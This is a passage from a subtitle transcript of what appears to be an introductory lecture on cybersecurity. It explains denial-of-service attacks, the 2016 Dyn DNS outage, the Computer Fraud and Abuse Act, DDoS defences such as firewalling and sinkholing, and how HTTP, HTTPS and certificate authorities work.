00:21:10,930 With distributed denial of service attacks 407 00:21:10,930 --> 00:21:13,972 or just regular denial of service attacks, it's just a question of scale, 408 00:21:13,972 --> 00:21:15,610 really. 409 00:21:15,610 --> 00:21:18,430 We're hitting those servers with so many web requests. 410 00:21:18,430 --> 00:21:19,390 I want to access this. 411 00:21:19,390 --> 00:21:22,210 I want to access this, hundreds, thousands, tens of thousands 412 00:21:22,210 --> 00:21:26,110 of these requests a second such that the computer can't possibly-- the server 413 00:21:26,110 --> 00:21:28,210 can't possibly field all of these inquiries 414 00:21:28,210 --> 00:21:33,010 that are coming and trying to give these requests the data they're asking for. 415 00:21:33,010 --> 00:21:35,425 Ultimately, that would eventually, after enough time, 416 00:21:35,425 --> 00:21:38,300 result in the server just crashing, throwing up its hands and saying, 417 00:21:38,300 --> 00:21:39,430 I don't know what to do. 418 00:21:39,430 --> 00:21:41,388 I can't possibly process all of these requests. 419 00:21:41,388 --> 00:21:45,010 But by tying it up in this way, the adversary 420 00:21:45,010 --> 00:21:49,840 has succeeded in damaging the infrastructure of the server. 421 00:21:49,840 --> 00:21:52,960 It's either denied the server the ability to process customers 422 00:21:52,960 --> 00:21:55,840 and payments or it's just taken down the entire website 423 00:21:55,840 --> 00:21:58,840 so there's no information available about the company anymore to anybody 424 00:21:58,840 --> 00:22:01,630 who's trying to look it up. 425 00:22:01,630 --> 00:22:04,990 These attacks are actually really, really common. 426 00:22:04,990 --> 00:22:06,910 There are some surveys that have been out that 427 00:22:06,910 --> 00:22:12,292 assess that roughly one sixth to one third of average-sized businesses that 428 00:22:12,292 --> 00:22:14,500 are part of this tech survey that goes out every year 429 00:22:14,500 --> 00:22:20,680 suffer some sort of DoS attack in a given year, so 16% to 35% or so 430 00:22:20,680 --> 00:22:23,910 of business, which is a lot of businesses when you think about it. 431 00:22:23,910 --> 00:22:25,660 And these attacks are usually quite small, 432 00:22:25,660 --> 00:22:27,610 and they're certainly not newsworthy. 433 00:22:27,610 --> 00:22:28,870 They might last a few minutes. 434 00:22:28,870 --> 00:22:30,190 They might last a few hours. 435 00:22:30,190 --> 00:22:31,690 But they're enough to be disruptive. 436 00:22:31,690 --> 00:22:32,898 They're certainly noteworthy. 437 00:22:32,898 --> 00:22:36,310 And they're something to avoid if it's possible. 438 00:22:36,310 --> 00:22:41,660 Cloud computing has made this problem kind of worse. 439 00:22:41,660 --> 00:22:45,190 And the reason for this is that, in a cloud computing context, 440 00:22:45,190 --> 00:22:47,980 your server that is running your business 441 00:22:47,980 --> 00:22:50,350 is not physically located on your premises. 442 00:22:50,350 --> 00:22:54,270 It was often the case that when a business would run a website 443 00:22:54,270 --> 00:23:00,430 or would run their business, they would have a server room that 444 00:23:00,430 --> 00:23:03,790 had the software that was necessary to run their website 445 00:23:03,790 --> 00:23:07,060 or to run whatever software-based services they provided. 446 00:23:07,060 --> 00:23:10,415 And it was all local to that business. 447 00:23:10,415 --> 00:23:12,980 No one else could possibly be affected. 448 00:23:12,980 --> 00:23:15,070 But in a cloud computing context, we are generally 449 00:23:15,070 --> 00:23:20,860 renting server space and server power from an entity such as Amazon Web 450 00:23:20,860 --> 00:23:24,790 Services, or Google Cloud Services, or some other large provider where 451 00:23:24,790 --> 00:23:30,460 it might be that 10, 20, 50, depending on the size of the business in question 452 00:23:30,460 --> 00:23:31,510 here-- 453 00:23:31,510 --> 00:23:35,920 multiple businesses are sharing the same physical resources, 454 00:23:35,920 --> 00:23:37,990 and they're sharing the same server space, 455 00:23:37,990 --> 00:23:41,260 such that if any one of those 50, let's say, 456 00:23:41,260 --> 00:23:44,950 businesses is targeted by hackers or adversaries 457 00:23:44,950 --> 00:23:49,570 for a denial of service attack, that might actually, as collateral damage, 458 00:23:49,570 --> 00:23:52,390 take out the other 49 businesses. 459 00:23:52,390 --> 00:23:54,400 They weren't even part of the attack. 460 00:23:54,400 --> 00:23:55,930 But cloud computing is-- 461 00:23:55,930 --> 00:23:57,820 we've heard about it as it's a great thing. 462 00:23:57,820 --> 00:24:00,640 It allows us to scale out our websites, make it 463 00:24:00,640 --> 00:24:02,800 so that we can handle more customers. 464 00:24:02,800 --> 00:24:06,280 It takes away the problem of security, web-based security, 465 00:24:06,280 --> 00:24:11,090 because we're outsourcing that to the cloud provider to give that to us. 466 00:24:11,090 --> 00:24:15,490 But it now introduces this new problem of, if we're all sharing the resources 467 00:24:15,490 --> 00:24:18,790 and any one of us gets attacked, then all of us 468 00:24:18,790 --> 00:24:21,760 lose the ability to access those resources and use them, 469 00:24:21,760 --> 00:24:24,550 which might cause all of our organizations to suffer 470 00:24:24,550 --> 00:24:28,090 the consequences of one single attack. 471 00:24:28,090 --> 00:24:30,700 This collateral damage can get even worse 472 00:24:30,700 --> 00:24:33,050 when you think about servers that are-- 473 00:24:33,050 --> 00:24:38,590 or businesses whose service is providing the internet, OK? 474 00:24:38,590 --> 00:24:40,970 So a very common example of this, or a noteworthy example 475 00:24:40,970 --> 00:24:44,260 of this, happened in 2016 with a service called 476 00:24:44,260 --> 00:24:49,480 DYN, D-Y-N. DYN is a DNS service provider, 477 00:24:49,480 --> 00:24:52,390 DNS being the domain name system. 478 00:24:52,390 --> 00:25:00,450 And the idea there is to map the things like www.google.com to its IP address. 479 00:25:00,450 --> 00:25:02,950 Because in order to actually access anything on the internet 480 00:25:02,950 --> 00:25:06,140 or to have a communication with anyone, you need to know their IP address. 481 00:25:06,140 --> 00:25:09,220 And as human beings, we tend not to actually remember 482 00:25:09,220 --> 00:25:14,020 what some website's IP address is, much like we may not recall a certain phone 483 00:25:14,020 --> 00:25:14,590 number. 484 00:25:14,590 --> 00:25:17,170 But if it has a mnemonic attached to it-- so for example, 485 00:25:17,170 --> 00:25:20,530 you know back in the day we had 1-800-COLLECT for collect calls. 486 00:25:20,530 --> 00:25:25,750 If you forgot the number, the literal digits of that phone number, 487 00:25:25,750 --> 00:25:29,290 you could still remember the idea of it because you had this mnemonic device 488 00:25:29,290 --> 00:25:30,760 to help remind you. 489 00:25:30,760 --> 00:25:35,110 Domain names, www.whatever.com, are just mnemonic devices 490 00:25:35,110 --> 00:25:37,570 that we use to refer to an IP address. 491 00:25:37,570 --> 00:25:41,770 And DNS servers provide this service to us. 492 00:25:41,770 --> 00:25:46,990 DYN is one of the major DNS providers for the internet overall. 493 00:25:46,990 --> 00:25:49,630 And if a denial of service attack, or in this case 494 00:25:49,630 --> 00:25:53,800 it was certainly a distributed denial of service attack because it was enormous, 495 00:25:53,800 --> 00:25:58,480 goes after pinging the IP address or hitting that server over 496 00:25:58,480 --> 00:26:03,070 and over and over, then it is unable to field requests from anyone else, 497 00:26:03,070 --> 00:26:06,880 because it's just getting pummeled by all of these requests from some botnet 498 00:26:06,880 --> 00:26:11,250 that some adversary or collective of adversaries has taken control of. 499 00:26:11,250 --> 00:26:13,990 This, the collateral damage, is no one can ever 500 00:26:13,990 --> 00:26:17,110 map a domain name to an IP address, which 501 00:26:17,110 --> 00:26:19,720 means no one can visit any of these websites 502 00:26:19,720 --> 00:26:24,250 unless you happen to know at the outset what the IP address of any given 503 00:26:24,250 --> 00:26:24,850 website was. 504 00:26:24,850 --> 00:26:27,243 If you knew the IP address, this wasn't a problem. 505 00:26:27,243 --> 00:26:29,410 You could just still directly go to that IP address. 506 00:26:29,410 --> 00:26:31,000 That's not the kind of attack here. 507 00:26:31,000 --> 00:26:33,460 But the attack instead tied up the ability 508 00:26:33,460 --> 00:26:38,410 to translate these mnemonic names into numbers. 509 00:26:38,410 --> 00:26:42,400 And as you can see, DYN was a DNS-- or is 510 00:26:42,400 --> 00:26:45,490 a DNS provider for much of the eastern half of the United States 511 00:26:45,490 --> 00:26:48,842 as well as the Pacific Northwest and California. 512 00:26:48,842 --> 00:26:50,800 And if you think about what kinds of businesses 513 00:26:50,800 --> 00:26:53,950 are headquartered in the Pacific Northwest 514 00:26:53,950 --> 00:26:58,810 and in California and in the New York area, for example, 515 00:26:58,810 --> 00:27:01,060 you probably see that some major, major services, 516 00:27:01,060 --> 00:27:03,435 including GitHub, which we've already talked about today, 517 00:27:03,435 --> 00:27:06,190 but also Facebook and others-- 518 00:27:06,190 --> 00:27:09,940 Harvard University's website was also taken down for several hours. 519 00:27:09,940 --> 00:27:12,320 This attack lasted about 10 hours, so quite prolonged. 520 00:27:12,320 --> 00:27:15,810 It really did a lot of damage on that day. 521 00:27:15,810 --> 00:27:18,310 It really crippled the ability of people to use the internet 522 00:27:18,310 --> 00:27:22,420 for a long period of time, so kind of very interesting. 523 00:27:22,420 --> 00:27:28,330 This article also talks a bit about how the United States government has 524 00:27:28,330 --> 00:27:31,450 decided to-- or legislature-- 525 00:27:31,450 --> 00:27:35,293 handle these kinds of issues, computer-based attacks. 526 00:27:35,293 --> 00:27:37,460 It takes take a look at the Computer Fraud and Abuse 527 00:27:37,460 --> 00:27:41,290 Act, which is codified at 18 USC 1030. 528 00:27:41,290 --> 00:27:47,020 And this is really the only computer crimes, general computer crimes, 529 00:27:47,020 --> 00:27:49,990 law that is on the books and talks about what 530 00:27:49,990 --> 00:27:53,710 it means to be a protected computer. 531 00:27:53,710 --> 00:27:57,430 And you'll be interested to know perhaps that any computer pretty much is 532 00:27:57,430 --> 00:27:58,780 a protected computer. 533 00:27:58,780 --> 00:28:02,320 The law specifically calls out government computers as well as 534 00:28:02,320 --> 00:28:04,990 any computer that may be involved in interstate commerce, 535 00:28:04,990 --> 00:28:08,200 which is you can imagine anybody who uses the internet, 536 00:28:08,200 --> 00:28:11,030 their computer then falls under the ambit of this act. 537 00:28:11,030 --> 00:28:13,030 So it's another interesting thing to take a look 538 00:28:13,030 --> 00:28:20,320 at if you're interested in how we deal with processing or prosecuting 539 00:28:20,320 --> 00:28:23,020 violations of computer-based crimes. 540 00:28:23,020 --> 00:28:26,330 All of it is actually sort of dealt with in the Computer Fraud and Abuse 541 00:28:26,330 --> 00:28:29,500 Act, which is not terribly long and hasn't been updated extensively 542 00:28:29,500 --> 00:28:32,150 since the 1980s other than some small amendments. 543 00:28:32,150 --> 00:28:34,150 So it's kind of interesting that we have not yet 544 00:28:34,150 --> 00:28:38,440 gotten to the point where we are defining and prosecuting 545 00:28:38,440 --> 00:28:42,400 specific types of computer crime, even though we've begun to figure out 546 00:28:42,400 --> 00:28:47,620 different types of computer crimes, such as DoS attacks, such as phishing, 547 00:28:47,620 --> 00:28:49,370 and so on. 548 00:28:49,370 --> 00:28:52,690 Now, hypothetically, a simple denial of service attack 549 00:28:52,690 --> 00:28:53,950 should be pretty easy to stop. 550 00:28:53,950 --> 00:28:59,230 And the reason for that is that there's only one person making the attack. 551 00:28:59,230 --> 00:29:03,130 All requests, recall, that happen over the internet happen via HTTP. 552 00:29:03,130 --> 00:29:07,585 And HTTP requires that the sender's IP address 553 00:29:07,585 --> 00:29:09,460 be part of that envelope that gets sent over, 554 00:29:09,460 --> 00:29:12,880 such that the server who wants to respond to the client, or the sender, 555 00:29:12,880 --> 00:29:13,980 can just reference. 556 00:29:13,980 --> 00:29:14,980 It's the return address. 557 00:29:14,980 --> 00:29:17,438 You need to be able to know where to send the data back to. 558 00:29:17,438 --> 00:29:19,680 And so any request that is coming from-- 559 00:29:19,680 --> 00:29:21,430 there are thousands of requests that might 560 00:29:21,430 --> 00:29:23,680 be coming from a single IP address. 561 00:29:23,680 --> 00:29:27,490 If you see that happening, you can just decide as a server in the software 562 00:29:27,490 --> 00:29:31,570 to stop accepting requests from that address. 563 00:29:31,570 --> 00:29:34,360 DDoS attacks, distributed denial of service attacks, 564 00:29:34,360 --> 00:29:36,160 are much harder to stop. 565 00:29:36,160 --> 00:29:40,390 And it's exactly because of the fact that there is not a single source. 566 00:29:40,390 --> 00:29:42,880 If there's a single source, again, we would just completely 567 00:29:42,880 --> 00:29:48,250 stop accepting any requests of any type from that computer. 568 00:29:48,250 --> 00:29:51,370 However, because we have so many different computers to contend with, 569 00:29:51,370 --> 00:29:54,010 the options to handle this are a bit more limited. 570 00:29:54,010 --> 00:29:57,400 There are some techniques for averting them or stopping them 571 00:29:57,400 --> 00:30:01,960 once they are detected, however, the first of which is firewalling. 572 00:30:01,960 --> 00:30:04,270 So the idea of a firewall is we are only going 573 00:30:04,270 --> 00:30:06,700 to allow requests of a certain type. 574 00:30:06,700 --> 00:30:08,950 We're going to allow them from any IP address, 575 00:30:08,950 --> 00:30:11,950 but we're only going to accept them into this port. 576 00:30:11,950 --> 00:30:15,880 Recall that TCPIP gives us the ability to say this service 577 00:30:15,880 --> 00:30:19,390 comes in via this port, so HTTP requests come in by a port 80. 578 00:30:19,390 --> 00:30:24,360 HTTPS requests come in via port 443. 579 00:30:24,360 --> 00:30:27,030 So imagine a distributed denial of service attack 580 00:30:27,030 --> 00:30:33,100 where typically the site would expect to be receiving requests on HTTPS. 581 00:30:33,100 --> 00:30:37,650 It generally only uses secured HTTP in order 582 00:30:37,650 --> 00:30:40,300 to process whatever requests are coming in. 583 00:30:40,300 --> 00:30:44,160 So it's expecting to receive a lot of traffic on port 443. 584 00:30:44,160 --> 00:30:47,970 And then all of a sudden a distributed denial of service attack 585 00:30:47,970 --> 00:30:51,930 begins and it's receiving lots of requests on port 80. 586 00:30:51,930 --> 00:30:55,440 One way to stop that attack before it starts to tie up resources 587 00:30:55,440 --> 00:30:57,540 is to just put a firewall up and say, I'm 588 00:30:57,540 --> 00:31:00,210 not actually going to accept any requests on port 80. 589 00:31:00,210 --> 00:31:03,650 And this may have a side effect of denying certain legitimate requests 590 00:31:03,650 --> 00:31:04,710 from getting through. 591 00:31:04,710 --> 00:31:07,920 But since the vast majority of the traffic that I receive on the site 592 00:31:07,920 --> 00:31:12,805 comes in via HTTPS on port 443, that's a small price to pay. 593 00:31:12,805 --> 00:31:15,180 I'd rather just allow the legitimate requests to come in. 594 00:31:15,180 --> 00:31:17,140 So that's one technique. 595 00:31:17,140 --> 00:31:19,950 Another technique is something called sinkholing. 596 00:31:19,950 --> 00:31:22,350 And it's exactly what you probably think it is. 597 00:31:22,350 --> 00:31:24,860 So a sinkhole, as you probably know, is a hole 598 00:31:24,860 --> 00:31:26,610 in the ground that swallows everything up. 599 00:31:26,610 --> 00:31:32,730 And a sink hole in digital context is a big black hole, basically, for data. 600 00:31:32,730 --> 00:31:34,890 It's just going to swallow up every single request 601 00:31:34,890 --> 00:31:36,960 and just not allow any of them out. 602 00:31:36,960 --> 00:31:39,962 So this would, again, stop the denial of service attack 603 00:31:39,962 --> 00:31:41,670 because it's just taking all the requests 604 00:31:41,670 --> 00:31:44,190 and basically throwing them in the trash. 605 00:31:44,190 --> 00:31:48,120 This won't take down the website of the company that's being attacked, 606 00:31:48,120 --> 00:31:49,590 so that's a good thing. 607 00:31:49,590 --> 00:31:52,590 But it's also not going to allow any legitimate traffic of any type 608 00:31:52,590 --> 00:31:54,460 through, so that might be a bad thing. 609 00:31:54,460 --> 00:31:56,460 But depending on the length of the attack, if it 610 00:31:56,460 --> 00:31:59,520 seems like it's going to be short, if the requests trickle off 611 00:31:59,520 --> 00:32:02,670 and stop because the attackers realize, we're not making any progress, 612 00:32:02,670 --> 00:32:04,020 we're not actually doing-- 613 00:32:04,020 --> 00:32:06,510 we're not getting the results that we had hoped for, 614 00:32:06,510 --> 00:32:08,490 then perhaps they would give up. 615 00:32:08,490 --> 00:32:11,903 Then the sinkhole could be stopped and regular traffic 616 00:32:11,903 --> 00:32:13,320 could start to flow through again. 617 00:32:13,320 --> 00:32:16,590 So a sinkhole is basically just take all the traffic that comes in 618 00:32:16,590 --> 00:32:18,665 and just throw it in the trash. 619 00:32:18,665 --> 00:32:20,665 And then finally, another technique we could use 620 00:32:20,665 --> 00:32:22,950 is something called packet analysis. 621 00:32:22,950 --> 00:32:27,390 So again, HTTP we know is requests via the web. 622 00:32:27,390 --> 00:32:30,120 And we learned a little bit that we have headers 623 00:32:30,120 --> 00:32:33,060 that are packaged alongside those HTTP packets 624 00:32:33,060 --> 00:32:38,010 where the request originated from, where it's going to. 625 00:32:38,010 --> 00:32:40,440 There's a whole lot of other metadata as well. 626 00:32:40,440 --> 00:32:44,250 You'll know, for example, what type of browser the individual is using 627 00:32:44,250 --> 00:32:46,290 and what operating system perhaps they are using 628 00:32:46,290 --> 00:32:50,950 and where, as in sort of a geographical generalization, are they. 629 00:32:50,950 --> 00:32:52,440 Are they in the US Northeast? 630 00:32:52,440 --> 00:32:55,350 Are they in South America and so on? 631 00:32:55,350 --> 00:32:59,160 Instead of deciding to restrict traffic via specific ports 632 00:32:59,160 --> 00:33:03,540 or just restrict all traffic, we could still allow all traffic to come in 633 00:33:03,540 --> 00:33:06,460 but inspect all of the packets as they come in. 634 00:33:06,460 --> 00:33:09,060 So for example, perhaps most of the traffic on our site we 635 00:33:09,060 --> 00:33:11,650 are expecting to come from the-- 636 00:33:11,650 --> 00:33:13,400 just because I used that example already-- 637 00:33:13,400 --> 00:33:14,700 US Northeast. 638 00:33:14,700 --> 00:33:16,650 And then all of a sudden we are experiencing 639 00:33:16,650 --> 00:33:20,640 tons of packets coming in that have IP addresses that all seem to be based-- 640 00:33:20,640 --> 00:33:24,050 or they have, as part of their packets, information 641 00:33:24,050 --> 00:33:25,800 that says that they're from South America, 642 00:33:25,800 --> 00:33:29,790 or they're from the US West Coast, or somewhere else that we don't expect. 643 00:33:29,790 --> 00:33:32,430 We can decide, after taking a quick look at that packet 644 00:33:32,430 --> 00:33:36,240 and analyzing those individual headers, that I'm not 645 00:33:36,240 --> 00:33:39,240 going to accept any packets from that location. 646 00:33:39,240 --> 00:33:42,970 The ones that match locations I'm expecting, I'll let through. 647 00:33:42,970 --> 00:33:45,948 And this, again, might prevent certain customers from getting through, 648 00:33:45,948 --> 00:33:48,990 certain legitimate customers who might actually be based in South America 649 00:33:48,990 --> 00:33:50,460 from getting through. 650 00:33:50,460 --> 00:33:54,980 But in general, it's going to block most of the damaging traffic. 651 00:33:54,980 --> 00:33:57,900 DDoS attacks are really frustrating for companies 652 00:33:57,900 --> 00:34:01,470 because they really can do a lot of damage. 653 00:34:01,470 --> 00:34:04,480 Usually the resources of the company will eventually-- especially 654 00:34:04,480 --> 00:34:08,280 if they're cloud-based and they rely on their cloud provider to help them 655 00:34:08,280 --> 00:34:12,290 scale up, usually the resources of the company being attacked 656 00:34:12,290 --> 00:34:14,699 are enough to eventually overwhelm and stop 657 00:34:14,699 --> 00:34:18,780 the attacker who usually has a much more limited set of resources. 658 00:34:18,780 --> 00:34:22,570 But again, depending on the type of business being attacked in this way-- 659 00:34:22,570 --> 00:34:25,580 again, think of the example of DYN, the DNS provider. 660 00:34:25,580 --> 00:34:27,330 The ramifications for one of these attacks 661 00:34:27,330 --> 00:34:31,350 can be really quite severe and really quite annoying and costly 662 00:34:31,350 --> 00:34:34,480 for a business that suffers it. 663 00:34:34,480 --> 00:34:38,050 So we just talked about HTTP and HTTPSS a moment ago 664 00:34:38,050 --> 00:34:40,050 when we were talking about firewalling, allowing 665 00:34:40,050 --> 00:34:42,790 some traffic on some of the ports but not other ports, 666 00:34:42,790 --> 00:34:47,290 so maybe allowing HTTP traffic but not HTTPS traffic. 667 00:34:47,290 --> 00:34:51,120 Let's take a look at these two technologies in a bit more detail. 668 00:34:51,120 --> 00:34:54,330 So HTTP, again, is the hypertext transfer protocol. 669 00:34:54,330 --> 00:34:58,530 It is how hypertext or web pages are transmitted over the internet. 670 00:34:58,530 --> 00:35:04,530 If I am a client and I make a request to you for some HTML content, 671 00:35:04,530 --> 00:35:08,130 then you as a server would send a response back to me, 672 00:35:08,130 --> 00:35:11,550 and then I would be able to see the page that I had requested. 673 00:35:11,550 --> 00:35:17,090 And every HTTP request has a specific format at the beginning of it. 674 00:35:17,090 --> 00:35:24,560 For example, we might see something like this, GET /execed HTTP/1.1, host: 675 00:35:24,560 --> 00:35:25,790 law.harvard.edu. 676 00:35:25,790 --> 00:35:28,670 Let's just quickly pick these apart again one more time. 677 00:35:28,670 --> 00:35:31,910 If you see GET at the beginning of an HTTP request, 678 00:35:31,910 --> 00:35:36,680 it means please fetch or get for me, literally, this page. 679 00:35:36,680 --> 00:35:40,970 The page I'm requesting specifically is /execed. 680 00:35:40,970 --> 00:35:46,520 And the host that I'm asking it from is, in this case, law.harvard.edu. 681 00:35:46,520 --> 00:35:50,690 So basically what I'm saying here is please fetch for me, 682 00:35:50,690 --> 00:35:54,120 or retreat from me, the HTML content that comprises 683 00:35:54,120 --> 00:36:00,410 http://law.harvard.edu/execed. 684 00:36:00,410 --> 00:36:05,990 And specifically I'm doing this using HTTP protocol version 1.1. 685 00:36:05,990 --> 00:36:08,270 We're still using version 1.1 even though I 686 00:36:08,270 --> 00:36:13,250 believe version 2.0 was defined almost 20 years ago now probably. 687 00:36:13,250 --> 00:36:17,030 And basically this is just HTTP's way of identifying 688 00:36:17,030 --> 00:36:19,040 how you're asking the question. 689 00:36:19,040 --> 00:36:23,540 So it's similar to me making a request and saying, oh, by the way, 690 00:36:23,540 --> 00:36:26,690 the rest of this request is written in French, or, oh, by the way, 691 00:36:26,690 --> 00:36:29,630 the rest of this request is written in Spanish. 692 00:36:29,630 --> 00:36:32,750 It's more like here are the parameters that you 693 00:36:32,750 --> 00:36:35,150 should expect to see because this request is 694 00:36:35,150 --> 00:36:39,540 in version 1.1, which differed non-trivially from version 1.0. 695 00:36:39,540 --> 00:36:45,590 So it's just an identifier for how exactly we are formatting our request. 696 00:36:45,590 --> 00:36:47,950 But HTTP is not encrypted. 697 00:36:47,950 --> 00:36:51,232 And so if we think about making a request to a server, 698 00:36:51,232 --> 00:36:52,940 if we're the client on the left and we're 699 00:36:52,940 --> 00:36:56,120 making a request to a server on the right, it might go something like this. 700 00:36:56,120 --> 00:37:00,530 Because the odds are pretty low that, if we're making a request, 701 00:37:00,530 --> 00:37:03,350 we are so close to the server that would serve 702 00:37:03,350 --> 00:37:05,660 that request to us that it wouldn't need to hop 703 00:37:05,660 --> 00:37:07,480 through any routers along the way. 704 00:37:07,480 --> 00:37:09,410 Remember, routers, their purpose in life is 705 00:37:09,410 --> 00:37:11,260 to send traffic in the right direction. 706 00:37:11,260 --> 00:37:13,350 And they contain a table of information that says, 707 00:37:13,350 --> 00:37:15,800 oh, if I'm making a request to some server over there, 708 00:37:15,800 --> 00:37:18,920 then the best path is to go here, and then I'll send it over there, 709 00:37:18,920 --> 00:37:20,890 and then it will send it there. 710 00:37:20,890 --> 00:37:23,480 Their job is to optimize and find the best path 711 00:37:23,480 --> 00:37:26,370 to get the request to where it needs to be. 712 00:37:26,370 --> 00:37:31,145 So if I'm initiating a request to, as the client, the server, 713 00:37:31,145 --> 00:37:33,020 it's going to first go through router A who's 714 00:37:33,020 --> 00:37:35,760 going to say, OK, I'm going to move it closer to the server 715 00:37:35,760 --> 00:37:38,960 so that it receives that request, goes to router B, goes to router C. 716 00:37:38,960 --> 00:37:41,900 And eventually router C perhaps is close enough to the server 717 00:37:41,900 --> 00:37:45,380 that it can just hand off the request directly. 718 00:37:45,380 --> 00:37:48,568 The server's then going to get that request, read it as HTTP/1.1, 719 00:37:48,568 --> 00:37:51,860 look at all the other metadata inside of the request to see if there's anything 720 00:37:51,860 --> 00:37:55,030 else that it's being asked for, and then it's going to send the information 721 00:37:55,030 --> 00:37:55,530 back. 722 00:37:55,530 --> 00:37:57,620 And in this example I'm having it go back 723 00:37:57,620 --> 00:38:00,860 exactly through the same chain of routers but in reverse. 724 00:38:00,860 --> 00:38:02,540 But in reality, that might be different. 725 00:38:02,540 --> 00:38:04,430 It might not go through the exact same three 726 00:38:04,430 --> 00:38:06,620 routers in this example in reverse. 727 00:38:06,620 --> 00:38:12,110 It might actually go from C to A to B, back to A depending on traffic 728 00:38:12,110 --> 00:38:14,780 that's happening on the network and how congested things are 729 00:38:14,780 --> 00:38:19,310 and whether there might be a new path that is better in the amount of time 730 00:38:19,310 --> 00:38:23,210 it took to process the request that I asked for. 731 00:38:23,210 --> 00:38:25,880 But remember, HTTP, not secured. 732 00:38:25,880 --> 00:38:26,720 Not encrypted. 733 00:38:26,720 --> 00:38:29,000 This is plain, over-the-air communication. 734 00:38:29,000 --> 00:38:33,560 We saw previously, when we took a look at a screenshot 735 00:38:33,560 --> 00:38:36,530 from a tool called Wireshark, that it's not 736 00:38:36,530 --> 00:38:41,420 that difficult on an unsecured network using an unsecured protocol to read, 737 00:38:41,420 --> 00:38:44,150 literally, the contents of those packets going to and from. 738 00:38:44,150 --> 00:38:46,320 So that's a vulnerability here for sure. 739 00:38:46,320 --> 00:38:48,980 Another vulnerability is any one of these computers 740 00:38:48,980 --> 00:38:51,060 along the way could be compromised. 741 00:38:51,060 --> 00:38:54,320 So for example, router A perhaps was infected 742 00:38:54,320 --> 00:38:57,510 by somebody who-- a router is just a computer as well. 743 00:38:57,510 --> 00:39:00,200 So perhaps it was infected by an adversary 744 00:39:00,200 --> 00:39:03,950 with some worm that will eventually make it part of some botnet, 745 00:39:03,950 --> 00:39:07,580 and it'll eventually start spamming some server somewhere. 746 00:39:07,580 --> 00:39:11,960 If router A is compromised in such a way that an adversary can just read all 747 00:39:11,960 --> 00:39:14,010 the traffic that flows through it-- and again, 748 00:39:14,010 --> 00:39:17,780 we're sending all of our traffic in an unencrypted fashion-- 749 00:39:17,780 --> 00:39:21,230 then we have another security loophole to deal with. 750 00:39:21,230 --> 00:39:27,440 So HTTPS resolves this problem by securing or encrypting 751 00:39:27,440 --> 00:39:32,150 all of the communications between a client and a server. 752 00:39:32,150 --> 00:39:33,762 So HTTP requests go to one port. 753 00:39:33,762 --> 00:39:34,970 We talked about that already. 754 00:39:34,970 --> 00:39:36,950 They go to port 80 by convention. 755 00:39:36,950 --> 00:39:40,790 HTTP requests go to port for 443 by convention. 756 00:39:40,790 --> 00:39:44,840 In order for HTTPS to work, the server is 757 00:39:44,840 --> 00:39:52,100 responsible for providing or possessing a valid what's called an SSL or TLS 758 00:39:52,100 --> 00:39:52,670 certificate. 759 00:39:52,670 --> 00:39:55,550 SSL is actually a deprecated technology now. 760 00:39:55,550 --> 00:39:58,070 It's been subsumed into TLS. 761 00:39:58,070 --> 00:40:01,580 But typically these things are still referred to as SSL certificates. 762 00:40:01,580 --> 00:40:04,430 And perhaps you've seen a screen that looks like this when 763 00:40:04,430 --> 00:40:05,990 you're trying to visit some website. 764 00:40:05,990 --> 00:40:08,240 You get a warning that your connection is not private. 765 00:40:08,240 --> 00:40:10,970 And at the very end of that warning, you are 766 00:40:10,970 --> 00:40:13,640 informed that the cert date is invalid. 767 00:40:13,640 --> 00:40:18,900 Basically this just means that their SSL certificate has expired. 768 00:40:18,900 --> 00:40:21,510 Now, what is an SSL certificate? 769 00:40:21,510 --> 00:40:27,000 So there are services that work alongside the internet called 770 00:40:27,000 --> 00:40:28,020 certificate authorities. 771 00:40:28,020 --> 00:40:32,520 And like GlobalSign, for example, from whom I borrowed the screenshots-- 772 00:40:32,520 --> 00:40:35,280 GoDaddy, who is also a very popular domain name provider, 773 00:40:35,280 --> 00:40:37,780 is also a certificate authority. 774 00:40:37,780 --> 00:40:42,600 And what they do is they verify that a particular website owns 775 00:40:42,600 --> 00:40:44,270 a particular private key-- 776 00:40:44,270 --> 00:40:48,230 or excuse me, a particular public key which has a corresponding private key. 777 00:40:48,230 --> 00:40:49,980 And the way they do that is they digitally 778 00:40:49,980 --> 00:40:51,928 sign something to the certificate authority. 779 00:40:51,928 --> 00:40:54,720 The certificate authority then goes through those exact same checks 780 00:40:54,720 --> 00:40:56,595 that we've seen before for digital signatures 781 00:40:56,595 --> 00:40:59,460 to verify that, yes, this person must own this public key. 782 00:40:59,460 --> 00:41:03,810 And the idea for this is we're trusting that, 783 00:41:03,810 --> 00:41:06,750 when I send a communication to you as the website 784 00:41:06,750 --> 00:41:12,120 owner using the public key that you say is yours, then it really is yours. 785 00:41:12,120 --> 00:41:16,110 There really is somebody out there or some third party 786 00:41:16,110 --> 00:41:19,530 that we've decided to collectively trust, the certificate authority, who 787 00:41:19,530 --> 00:41:20,670 is going to verify this. 788 00:41:20,670 --> 00:41:23,100 Now, why does this matter? 789 00:41:23,100 --> 00:41:27,570 Why do we need to verify that someone's public key is what they say it is? 790 00:41:27,570 --> 00:41:31,032 Well, it turns out that this idea of asymmetric encryption, 791 00:41:31,032 --> 00:41:33,990 or public and private key cryptography that we've previously discussed, 792 00:41:33,990 --> 00:41:38,520 does form part of the core of HTTPS. 793 00:41:38,520 --> 00:41:43,200 But as we'll see in a moment, we don't actually use public and private keys 794 00:41:43,200 --> 00:41:47,100 to communicate except at the very, very beginning of our interaction 795 00:41:47,100 --> 00:41:52,680 with some site when we are using HTTPS. 796 00:41:52,680 --> 00:41:56,370 So the way this really happens underneath the hood 797 00:41:56,370 --> 00:42:00,780 is via the secure sockets layer, SSL, which is now known as the transport 798 00:42:00,780 --> 00:42:02,950 layer security overall protocol. 799 00:42:02,950 --> 00:42:06,270 There's other things that are folded into it, but SSL is part of it. 800 00:42:06,270 --> 00:42:09,210 And this is what happens. 801 00:42:09,210 --> 00:42:14,970 When I am requesting a page from you, and you are the server, 802 00:42:14,970 --> 00:42:18,540 and I am requesting this via HTTPS, I am going 803 00:42:18,540 --> 00:42:22,800 to initially make a request using the public key that I believe 804 00:42:22,800 --> 00:42:24,780 is yours because the certificate authority has 805 00:42:24,780 --> 00:42:30,395 vouched for you, saying that I would like to make a encrypted request. 806 00:42:30,395 --> 00:42:32,520 And I don't want to send that request over the air. 807 00:42:32,520 --> 00:42:34,145 I don't want to send that in the clear. 808 00:42:34,145 --> 00:42:37,110 I want to send it to you using the encryption that you say is yours. 809 00:42:37,110 --> 00:42:41,160 So I send a request to you, encrypting it using your public key. 810 00:42:41,160 --> 00:42:42,180 You receive the request. 811 00:42:42,180 --> 00:42:45,150 You decrypt it using your 